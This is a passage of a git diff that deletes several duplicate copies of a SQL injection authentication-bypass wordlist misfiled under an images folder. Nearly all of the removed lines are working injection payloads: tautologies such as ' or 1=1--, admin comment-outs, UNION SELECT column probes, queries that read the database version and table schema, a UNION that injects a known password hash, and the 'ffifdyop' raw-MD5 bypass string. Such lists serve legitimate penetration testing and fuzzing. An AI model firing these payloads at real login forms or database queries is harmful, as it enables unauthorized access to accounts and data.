-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
